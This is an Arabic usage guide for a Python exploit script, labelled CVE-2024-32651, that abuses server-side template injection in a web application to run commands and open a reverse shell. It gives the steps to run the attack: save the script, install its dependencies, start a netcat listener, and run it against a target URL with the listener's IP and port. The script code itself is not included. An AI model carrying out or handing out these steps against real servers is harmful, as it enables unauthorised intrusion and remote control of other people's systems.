
استغلال حقن القالب من جانب الخادم
استغلال حقن القالب من جانب الخادم!!
تنفيذ التعليمات البرمجية عن بُعد عبر حقن القالب من جانب الخادم (SSTI) في تطبيق ويب معرّض للثغرة
يستهدف هذا الاستغلال تطبيق ويب معرّضًا لثغرة حقن القالب من جانب الخادم (SSTI). من خلال استغلال هذه الثغرة، يمكن للمهاجم تنفيذ أوامر عشوائية على الخادم. يعمل البرنامج النصي ببايثون المقدم على أتمتة عملية الاستغلال عن طريق إرسال حمولة تؤدي إلى تشغيل قشرة عكسية.
لإعادة إنتاج الثغرة، قم بتنفيذ البرنامج النصي ببايثون المقدم ضد تطبيق الويب المعرّض للثغرة. تأكد من أن لديك مستمعًا (مثل nc -lvp 9999) يعمل لالتقاط اتصال القشرة العكسية.
احفظ البرنامج النصي في ملف باسم CVE-2024-32651.py.
ثبّت مكتبات بايثون المطلوبة إذا لم تكن مثبتة بالفعل:
pip install requests beautifulsoup4
لاستخدام البرنامج النصي، قم بتوفير وسائط سطر الأوامر التالية:
--url: عنوان URL الأساسي لتطبيق الويب المعرّض للثغرة (مثل http://10.10.10.10:5000).--port: منفذ المستمع (مثل 9999).--ip: عنوان IP الخاص بالمستمع (مثل 10.10.50.22).--notification: (اختياري) عنوان URL للإشعار إذا كنت تريد استخدام عنوان إشعار محدد.python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
يعتمد هذا الإصدار المُصلح من الاستغلال على استغلال أصلي نُشر بواسطة Zach Crosman (zcrosman) بمعرف EDB-ID: 52027. يمكنك الاطلاع على الاستغلال الأصلي هنا. أشكر Zach Crosman على مساهمته في مجتمع الأمان.